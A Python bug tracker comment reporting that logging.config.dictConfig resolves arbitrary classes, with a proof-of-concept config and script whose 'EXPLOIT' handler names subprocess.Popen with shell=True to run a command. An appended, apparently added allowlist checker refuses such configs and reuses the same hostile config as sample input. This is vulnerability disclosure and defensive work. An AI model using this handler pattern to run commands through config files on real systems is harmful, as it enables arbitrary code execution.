MarkBaggett <lo127...@gmail.com> added the comment:
Let me also mention that the problem really includes anything that uses the resolve() functions. Here is a working example that puts an exploit in a HANDLER rather than a FORMATTER.

$ ls /tmp/alsoworked
ls: cannot access '/tmp/alsoworked': No such file or directory
$ python calculator.py
$ ls /tmp/alsoworked
/tmp/alsoworked
$ cat log.config
{
    "version":1,
    "root":{
        "handlers" : ["EXPLOIT"]
    },
    "handlers":{
        "EXPLOIT":{
            "class": "subprocess.Popen",
            "args" : "touch /tmp/alsoworked",
            "shell" : "True"
        }
    }
}

Or if you prefer it in one file..

-----------------------------
import logging.config
import json

log_config_txt = '''{
    "version":1,
    "root":{
        "handlers" : ["EXPLOIT"]
    },
    "handlers":{
        "EXPLOIT":{
            "class": "subprocess.Popen",
            "args" : "touch /tmp/alsoworks",
            "shell" : "True"
        }
    }
}
'''

log_config = json.loads(log_config_txt)
logging.config.dictConfig(log_config)
------------------------

----------

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue46251>
_______________________________________
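A defensive counterpart to the report above, as an added example that is not part of the original message or of CPython: a pre-check that walks a logging config dict and refuses any `class` or `()` entry, or `ext://` value, that is not on an allowlist before `dictConfig()` is called. The names `ALLOWED_CLASSES`, `ALLOWED_EXT`, `find_unsafe_references` and `safe_dict_config` are hypothetical, and the allowlist contents are assumptions to adapt per application.

```python
import logging.config

# Assumption: illustrative allowlists; extend with what your application uses.
ALLOWED_CLASSES = frozenset({
    "logging.StreamHandler", "logging.FileHandler",
    "logging.handlers.RotatingFileHandler", "logging.Formatter",
})
ALLOWED_EXT = frozenset({"ext://sys.stdout", "ext://sys.stderr"})

# The handler config quoted in the message above, embedded as sample input.
POSTED_CONFIG = {
    "version": 1,
    "root": {"handlers": ["EXPLOIT"]},
    "handlers": {"EXPLOIT": {"class": "subprocess.Popen",
                             "args": "touch /tmp/alsoworked",
                             "shell": "True"}},
}

class UnsafeLoggingConfig(ValueError):
    """Raised when a config names a callable outside the allowlist."""

def find_unsafe_references(node, path="config"):
    """Return (path, value) pairs for each reference outside the allowlists."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}"
            if key in ("class", "()"):
                # dictConfig resolves these keys to a callable and calls it.
                if not (isinstance(value, str) and value in ALLOWED_CLASSES):
                    found.append((here, value))
            else:
                found.extend(find_unsafe_references(value, here))
    elif isinstance(node, (list, tuple)):
        for i, item in enumerate(node):
            found.extend(find_unsafe_references(item, f"{path}[{i}]"))
    elif isinstance(node, str) and node.startswith("ext://"):
        # ext:// values are imported by dictConfig; allow only known objects.
        if node not in ALLOWED_EXT:
            found.append((path, node))
    return found

def safe_dict_config(config):
    """Apply the config only if every resolvable reference is allowlisted."""
    unsafe = find_unsafe_references(config)
    if unsafe:
        raise UnsafeLoggingConfig(f"refusing logging config: {unsafe}")
    logging.config.dictConfig(config)

if __name__ == "__main__":
    print(find_unsafe_references(POSTED_CONFIG))
```

The check runs before anything is resolved, so a rejected config never reaches the import and call step that the message demonstrates.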